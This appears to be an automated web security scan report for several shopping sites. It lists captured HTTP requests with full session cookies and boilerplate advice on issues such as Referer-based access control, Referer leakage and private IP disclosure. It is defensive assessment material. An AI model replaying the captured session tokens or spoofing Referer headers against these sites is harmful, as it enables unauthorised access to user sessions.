GET /shams HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shower-curtains HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /table-linens-and-decor HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.prontostyle.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?mid=41048ba4-12e1505343e-294f HTTP/1.1 Host: www.prontotech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pbar/pj.jsp?b=Skechers&c=&d=Womens&i=%2Fpi%2Fskech%2Fskech374763_41836_lg.jpg&p=6 HTTP/1.1 Host: www.shoebuy.com Proxy-Connection: keep-alive Referer: http://www.shoebuy.com/skechers-compulsions-crystalize/374763/798870?cm_mmc=dealtime-_-none-_-none-_-none Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ShoebuyPbar=; ShoebuyEntry=dealtime; NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660; sbver=a
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /table-lamps HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cgi-bin/sbref.cgi?link=dealtime&path=skechers-compulsions-crystalize%2F374763%2F798870 HTTP/1.1 Host: www.shoebuy.com Proxy-Connection: keep-alive Referer: http://www.prontostyle.com/prodRedirExitInterst.do?exitPoint=disambiguated-search&merchantProductId=1688692330&pageLocation=gridProductImage5&parentId=35a611ad-12e151753d5--3ea0&shouldLookupGuidesterCpc=true Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.shoebuy.com/skechers-compulsions-cry ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /favicon.ico HTTP/1.1 Host: www.shoebuy.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ShoebuyPbar=; ShoebuyEntry=dealtime; NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660; sbver=a
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.
Request 1
GET /pbar/pj.jsp?b=Skechers&c=&d=Womens&i=%2Fpi%2Fskech%2Fskech374763_41836_lg.jpg&p=6 HTTP/1.1 Host: www.shoebuy.com Proxy-Connection: keep-alive Referer: http://www.shoebuy.com/skechers-compulsions-crystalize/374763/798870?cm_mmc=dealtime-_-none-_-none-_-none Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ShoebuyPbar=; ShoebuyEntry=dealtime; NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660; sbver=a
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: www.prontotech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.shoebuy.com/skechers-compulsions-cry ...[SNIP]...
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.